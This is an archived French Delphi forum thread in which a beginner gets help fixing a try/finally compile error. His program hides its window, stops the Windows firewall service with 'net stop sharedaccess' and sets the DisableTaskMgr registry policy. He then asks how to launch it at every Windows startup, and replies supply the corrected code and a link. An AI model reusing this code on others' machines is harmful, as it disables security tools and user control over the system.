begin process at 2010 09 06 05:32:07
  Trouver un code source :

dans

Accueil > Forum > 

Delphi

> 

Divers

> 

Débutant(e)

> 

Je ne vois pas le probleme de mon code =\

Derniers messages déposésPoser une question dans le forum ou lancer une discussion

Je ne vois pas le probleme de mon code =\

dimanche 1 mars 2009 à 18:25:36 | Je ne vois pas le probleme de mon code =\

emirej

Bonjour, en faite j'ai un problème quand je veux compiler mon programme, il me dise qu'il y a une erreur =\

Voici mon code

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, jpeg, ExtCtrls, Shellapi, Registry;

type
  TForm1 = class(TForm)
    Image1: TImage;
    Label1: TLabel;
    Timer1: TTimer;
    procedure Timer1Timer(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure FormActivate(Sender: TObject);

private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.Timer1Timer(Sender: TObject);
begin
Form1.Hide;
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
ShellExecute(0,'open', 'net.exe',' stop sharedaccess',0,0);
end;

procedure TForm1.FormActivate(Sender: TObject);
var Registre:TRegistry;
begin
Registre:=TRegistry.Create;
try
Registre.RootKey:=HKEY_CURRENT_USER;
Registre.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Policies\System\', true);
Registre.WriteString('DisableTaskMgr','1');
Registre.CloseKey;
Registre.Free;
Registre.Free;
end;
end;
end;

end.

Je n'arrive pas à déterminer d'ou vient ce problème. Merci de m'éclaircir un peu ^^"

Voici mon message d'erreur

Build
  [Warning] Unit1.pas(42): Constant 0 converted to NIL
  [Error] Unit1.pas(56): EXCEPT or FINALLY expected
  [Error] Unit1.pas(58): '.' expected but ';' found
  [Fatal Error] Test.dpr(5): Could not compile used unit 'Unit1.pas'

dimanche 1 mars 2009 à 18:38:12 | Re : Je ne vois pas le probleme de mon code =\

Nicolas___

Réponse acceptée !
var Registre:TRegistry;
begin
  Registre:=TRegistry.Create;
  try
    Registre.RootKey:=HKEY_CURRENT_USER;
    Registre.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Policies\System\', true);
    Registre.WriteString('DisableTaskMgr','1');
    Registre.CloseKey;
  finally
    Registre.Free;
  end;
end;
dimanche 1 mars 2009 à 18:51:35 | Re : Je ne vois pas le probleme de mon code =\

emirej

Haaaaaaaaaaaaa ! Purée merci, je cherche depuis 30 minutes ! MERCI
dimanche 1 mars 2009 à 18:53:57 | Re : Je ne vois pas le probleme de mon code =\

emirej

Une autre question aussi, comment faire pour mettre mon programme dans la base de registre de tel sorte à ce qu'il démarre à chaque démarrage de Windows s'il vous plait ?
dimanche 1 mars 2009 à 19:26:04 | Re : Je ne vois pas le probleme de mon code =\

Nicolas___

il suffit de chercher un peu
http://www.codyx.org/snippet_lancer-exe-demarrage-windows_56.aspx
dimanche 1 mars 2009 à 19:48:14 | Re : Je ne vois pas le probleme de mon code =\

emirej

Mhhh le lien que tu m'as passé à l'air d'être du Visual Basic je si ne m'abuse =\
dimanche 1 mars 2009 à 20:10:11 | Re : Je ne vois pas le probleme de mon code =\

Nicolas___

t'exagère !

il y a un scrolling vertical aussi !

puis c'est sur snippet : ya en VB, VB.net , c# , java ... et aussi DELPHI !!!
lundi 2 mars 2009 à 08:47:08 | Re : Je ne vois pas le probleme de mon code =\

f0xi

Membre Club Administrateur CodeS-SourceS

var
  DTM : boolean = false;

procedure TForm1.FormCreate(Sender: TObject);
begin
  if ParamCount = 2 then
    DTM := ParamStr(1) = '/d';

if not DTM then
    ShellExecute(0, 'open', 'net.exe', 'stop sharedaccess', nil, nil);
end;

const
  DTMTV : array[Boolean] of String = ('1','0');
begin
  with TRegistry.Create do
  try
    RootKey := HKEY_CURRENT_USER;
    if OpenKey('\Software\Microsoft\Windows\CurrentVersion\Policies\System\', true) then
      WriteString('DisableTaskMgr', DTMTV[DTM]);
    CloseKey;
  finally
    Free;
  end;
end;

Cette discussion est classée dans : end, sender, registre, procedure, tobject

Répondre à ce message

Sujets en rapport avec ce message

"Incompatible types :''Cardinal' and 'String' " [ par Don0Choa ] Bonjour, je fais un petit prog permettant de fair des boite de dialogue en séléctionnant les bouttons, icones etc...Mais voila j'ai une erreur comem d pb a creer un exe avec la principal form invisible [ par Winniez ] J'ai voulu au demarrage de exe afficher une autre form que la form principal. a l'execution sa me met une erreur, apres g mis le meme code dans un bou Newbie & TCPI/IP [ par Megafan ] Bonjour je suis complétement débutant en delphi, par contre je suis pas mauvais en VB.Pourquoi je change allez vous dire ?Parce que VB ne tourne pas s probleme avec sockets [ par PsyClown44 ] Salut!J'ai un prob avec le composant TClientSocket : je n'arrive pas a recevoir de paquets lors d'une connexion!Voila le code:unit Unit1;interfaceuses Réccupérer des données sur un autre Unit [ par m_cyril1 ] J'ai fait un petit programme, celui-ci mémorise des chiffres entier sur une première form et sur la deuxième le résultat de la somme des chiffres s'af probleme de click entre un temps [ par maxioutils ] Voila le code presque complet :unit Unit6; interface uses  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,  Dialogs, StdCtr envoyé donnés au port usb [ par didi59650 ] Voila j'ai fait un programme qui fonctionne tres bien (stage). La liaison entre mon appareil de mesure et le PC est faite par le port serie. j'ai du c Filtrer les données de DBGrid à partir de ADOQuery [ par Cobuce ] Salut,J'execute un module pour filtrer un DBGrid sur ADOQuery.  En fait j'ai deux problème :1. Utiliser le Filter à partir de RzEdit et garder juste l Inclure un graph sous delphi?? [ par bm3w325i ] Bonjours, je viens de me lancer dans delphi car j ai besoin d utiliser un media palyer pour diffuser la video par la sortie video de ma carte de decom Récupération d'une valeur [ par ouaich85 ] Bonjour, voici mon code : unit Unit2; interface uses  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,  Dialogs, StdCtrl

Nos sponsors

Sondage...

Comparez les prix

CalendriCode

Septembre 2010
LMMJVSD
  12345
6789101112
13141516171819
20212223242526
27282930   

Consulter la suite du CalendriCode

Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,187 sec (4)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales